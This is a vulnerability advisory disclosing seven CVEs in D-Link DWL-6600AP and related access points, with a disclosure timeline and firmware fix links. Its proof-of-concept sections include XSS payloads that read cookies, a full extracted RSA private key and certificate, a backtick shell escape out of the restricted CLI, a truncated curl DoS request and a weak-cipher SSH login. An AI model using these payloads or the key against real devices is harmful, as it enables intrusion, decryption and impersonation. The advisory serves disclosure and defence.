D-Link 6600-AP XSS / DoS / Information Disclosure

Risk: Medium
Local: No
Remote: Yes

# Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1:<script>alert(document.cookie)</script> Example 2:<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST ' ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host ' (' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '' (RSA) to the list of known hosts. admin@'s password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

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